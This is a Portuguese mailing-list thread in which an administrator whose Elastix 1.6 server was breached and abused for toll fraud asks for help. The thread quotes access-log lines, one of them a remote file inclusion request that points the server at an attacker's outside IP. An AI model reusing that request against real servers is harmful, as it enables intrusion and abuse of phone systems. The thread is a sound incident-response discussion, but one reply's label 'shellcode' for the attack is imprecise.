[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6

Nielsen Alves de Oliveira nielsen em freesolutions.com.br
Segunda Novembro 22 16:09:54 BRST 2010 

Para vc pesquisar isto que foi usado em vc, foi um SHELLCODE.

Em 22 de novembro de 2010 15:00, Alejandro Flores <
alejandrorflores em gmail.com> escreveu:

> Gleidison,
>
> > Sidinei,
> > Obrigado pela Resposta,
> > cara sofri uma invasao essa madrugada, e os caras arrebentaram de
> ligaçoes
> > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo.
> > alguem poderia me ajudar a bloquear isso.
> > /var/log/httpd/access_log
> > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs
> > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"
> > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET
> > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt?
> HTTP/1.1"
> > 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>
> Você instalou algo mais no seu elastix? Ele faz referência a pastas
> que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo
> que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso,
> estava com falhas de segurança.
> Nessa segunda linha do log ele se certifica de que o servidor está
> 'vulnerável' e depois disso você ta frito.
>
>
> --
> Abraço!
> Alejandro Flores
> http://www.triforsec.com.br/
> _______________________________________________
> KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk.
> - Hardware com alta disponibilidade de recursos e qualidade KHOMP
> - Suporte técnico local qualificado e gratuito
> Conheça a linha completa de produtos KHOMP em www.khomp.com.br
> _______________________________________________
> Temos tudo para seu projeto VoIP com Asterisk!
> Descontos especiais para assinantes da AsteriskBrasil.org.
> Registre-se e receba um cupom exclusivo de desconto!
> Acesse agora www.voipmania.com.br
> ______________________________________________
> Lista de discussões AsteriskBrasil.org
> AsteriskBrasil em listas.asteriskbrasil.org
> http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil
> ______________________________________________
> Para remover seu email desta lista, basta enviar um email em branco para
> asteriskbrasil-unsubscribe em listas.asteriskbrasil.org
>



-- 
At.


           ____________________________
                  Nielsen Alves de Oliveira
     Consultor em Sistemas Computacionais
                              CIO
                      Free Solutions
                Telefone: (65) 3025-7356
            Celular: (65) 9287-5331 (Vivo)
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: http://listas.asteriskbrasil.org/pipermail/asteriskbrasil/attachments/20101122/eb7d6aeb/attachment.htm

Mais detalhes sobre a lista de discussão AsteriskBrasil